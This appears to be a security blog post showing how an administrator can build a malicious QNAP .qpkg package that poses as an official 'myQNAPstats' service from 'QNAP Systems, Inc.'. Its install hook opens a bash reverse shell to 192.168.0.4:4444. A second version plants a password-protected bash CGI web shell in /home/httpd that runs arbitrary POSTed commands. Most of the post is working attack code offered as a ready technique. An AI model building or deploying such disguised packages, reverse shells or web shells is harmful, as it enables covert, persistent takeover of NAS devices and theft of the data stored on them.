B13: Qnap QTS light backdooring
Today we will see how it is possible as an admin to execute commands on a Qnap. This trick is interesting in case you would not be able to find post-auth Command Injections anymore which could happen due to the speed of patching Qnap (LoL).
The technique is simple, it consists in creating a malicious Qnap package (.qpkg file) and installing it will allow us to execute commands moreover it will allow us to make a light backdoor. Two techniques will be presented.
But first I invite you to read this documentation:
Creation of a malicious package
From /share/CACHEDEV1_DATA/.qpkg/QDK execute the following command:
qbuild --create-env myQNAPstats
then:
cd myQNAPstats
then use vi to edit /share/CACHEDEV1_DATA/.qpkg/QDK/myQNAPstats/qpkg.cfg as follows:
QPKG_NAME="myQNAPstats"
QPKG_DISPLAY_NAME="myQNAPstats"
QPKG_VER="6.0.0"
QPKG_AUTHOR="QNAP Systems, Inc."
QPKG_SUMMARY="myQNAPstats Link is the best stats service provided by myQNAPcloud."
QPKG_RC_NUM="100" #for rcS and rcK
QPKG_SERVICE_PROGRAM="myQNAPstats.sh"
QPKG_WEBUI="/stats"
QTS_MINI_VERSION="1.0.0"
QTS_MAX_VERSION="10.0.0"
Our package is ready we can start to make it malicious.
Simple execution of commands
You just have to edit the file /share/CACHEDEV1_DATA/.qpkg/QDK/myQNAPstats/package_routines as such:
######################################################################
# Define any package specific initialization that shall be performed
# before the package is installed.
######################################################################
pkg_init(){
# Here you just have to add the commands you want to run.
# Example: Here we add a reverse shell connecting to IP address 192.168.0.4 on port 4444.
bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &
}
#
Then execute the command qbuild:
Here is our POC in action:
Now let’s look at how to build a light backdoor.
Light backdoor
We know that the webserver works with CGI scripts but we also know that the
location of these CGI scripts is in /home/httpd.
Moreover it is possible to realize a CGI script in bash that’s why I named this
technique light backdooring. To do this, the file /share/CACHEDEV1_DATA/.qpkg/QDK/myQNAPstats/package_routines
in our package (myQNAPstats) must contain the following code:
######################################################################
# Define any package specific initialization that shall be performed
# before the package is installed.
######################################################################
pkg_init(){
# Here you just create at the Webserver root directory a CGI script in bash.
cat <<EOF >> /home/httpd/light_backdoor.cgi
#!/bin/bash
echo "Content-type: text/html"
echo ""
if [ "\$REQUEST_METHOD" = "GET" ]; then
echo ''
fi
if [ "\$REQUEST_METHOD" = "POST" ]; then
read -n "\$CONTENT_LENGTH" QUERY_STRING_POST
password=\`echo "\$QUERY_STRING_POST" | awk '{split(\$0,array,"&")} END{print array[1]}' | awk '{split(\$0,array,"=")} END{print array[2]}'\`
command=\`echo "\$QUERY_STRING_POST" | awk '{split(\$0,array,"&")} END{print array[2]}' | awk '{split(\$0,array,"=")} END{print array[2]}'\`
if [ "\$password" != "6da47ce6776f4629be2d4563a8040349dfa081b3" ]; then
echo ''
else
echo '<html>'
echo '<head>'
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
echo '<title>Light backdoor POC</title>'
echo '</head>'
echo '<body>'
echo "Command: \$command"
echo '----OUTPUT_START----'
echo "\$(\$command)"
echo '----OUTPUT_END----'
echo '</body>'
echo '</html>'
fi
fi
exit 0
EOF
chmod +x /home/httpd/light_backdoor.cgi
}
#
Here is a small video of the POC: